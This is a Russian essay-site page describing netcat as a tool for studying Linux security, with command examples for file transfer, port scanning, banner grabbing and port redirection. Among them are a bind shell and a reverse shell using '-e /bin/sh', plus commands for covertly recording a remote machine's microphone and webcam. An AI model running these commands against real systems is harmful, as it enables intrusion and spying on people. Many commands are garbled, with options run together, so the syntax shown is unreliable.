Помощь в учёбе, очень быстро...
Работаем вместе до победы

Netcat. 
Исследование механизмов безопасности в Linux-подобных ОС

РефератПомощь в написанииУзнать стоимостьмоей работы

Теперь весь трафик, пришедший на порт 2525, будет перенаправляться на стандартный 25-й SMTP-порт. Таким же образом мы можем завернуть трафик с любого порта на другой порт/машину, просто видоизменив первые две команды. В этом примере прокси находится по адресу 172.16.64.1:8080, а флаг -Xconnect говорит о том, что он работает с протоколом HTTP. Также поддерживаются SOCKS версий 4 и 5, но о них… Читать ещё >

Netcat. Исследование механизмов безопасности в Linux-подобных ОС (реферат, курсовая, диплом, контрольная)

Netcat — это сетевой инструмент, замену которому вряд ли можно найти. Обладая предельной простотой, он невероятно богат на функционал, а диапазон его применения столь широк, что в народе netcat окрестили «Швейцарским армейским ножом».

Утилита netcat по сути не делает ничего, кроме копирования данных в сетевой порт и из него, но при этом с ее помощью можно:

1. Передавать файлы (первую команду выполняем на принимающей машине, вторую — на передающей:

ncl 31 334 > filename nc 172.16.69.143 31 334 < filename

2. Удаленно читать логи (первая — сервер, вторая — клиент):

ncf /var/log/messages | ncl 31 334 nc 172.16.69.143 31 334

3. Использовать вместо telnet (первая — telnet-сервер, вторая — клиент):

ncl -p 31 334 -e /bin/sh nc 172.16.69.143 31 334

4. Сканировать на открытые порты:

ncz execbit.ru 1−1024

5. Осуществлять фингерпринт сервисов на основе баннеров:

echo «QUIT» | nc execbit.ru 1−1024

6. Организовывать обратный шелл (первая — клиент, вторая — сервер, однако шелл откроется от сервера к клиенту):

nce /bin/sh 172.16.69.143 31 334 ncl -p 31 334

7. Делать микрофонную запись с удаленной машины (сервер, клиент):

arecordf datt raw | ncl 31 337 nc 172.16.69.143 31 337 | oggenc — -ro nc. ogg

8. Получать снимки с web-камеры удаленной машины (сервер, клиент):

while [ 1 ]; do streamero /tmp/photo.jpeg; ncl 31 337 photo. jpeg

Однако важно понимать, что существует несколько версий Netcat, поведение которых может отличаться. Экземпляр, поставляемый с дистрибутивами Linux, — это оригинал, доживший до наших дней. Все пять приведенных примеров он отработает без проблем. Версия под названием GNU Netcat не поддерживает опции -e, поэтому второй и пятый примеры она не воспримет.

Особого внимания заслуживает Netcat, распространяемый вместе с BSD-системами, опция -e в нем есть, но предназначена она для шифрования входящего и исходящего трафика методом IPSec ESP:

nce 'in ipsec esp/transport//require' -e 'out ipsec esp/transport//require' 172.16.69.143 31 334

Кроме того, BSD Netcat способен подключаться к удаленной машине через прокси:

ncx172.16.64.1:8080 -Xconnect 172.16.69.143 31 334

В этом примере прокси находится по адресу 172.16.64.1:8080, а флаг -Xconnect говорит о том, что он работает с протоколом HTTP. Также поддерживаются SOCKS версий 4 и 5, но о них следует информировать netcat через флаг -X4 или -X5.

Сам Netcat легко использовать в качестве прокси или редиректора портов, но в этом случае его лучше связать с демоном inetd:

echo 'redirect-2525-to-25 2525/tcp' >> /etc/services echo 'redirect-2525-to-25 stream tcp nowait nobody /usr/bin/nc ncw 2 127.0.0.1 25' >> /etc/inetd.conf

killallHUP inetd

Теперь весь трафик, пришедший на порт 2525, будет перенаправляться на стандартный 25-й SMTP-порт. Таким же образом мы можем завернуть трафик с любого порта на другой порт/машину, просто видоизменив первые две команды.

Кстати, пользователи дистрибутивов Linux могут вообще не заморачиваться с Netcat: ведь демон xinetd, ставший стандартом в Linux-системах, сам умеет перенаправлять сетевой трафик.

Показать весь текст
Заполнить форму текущей работой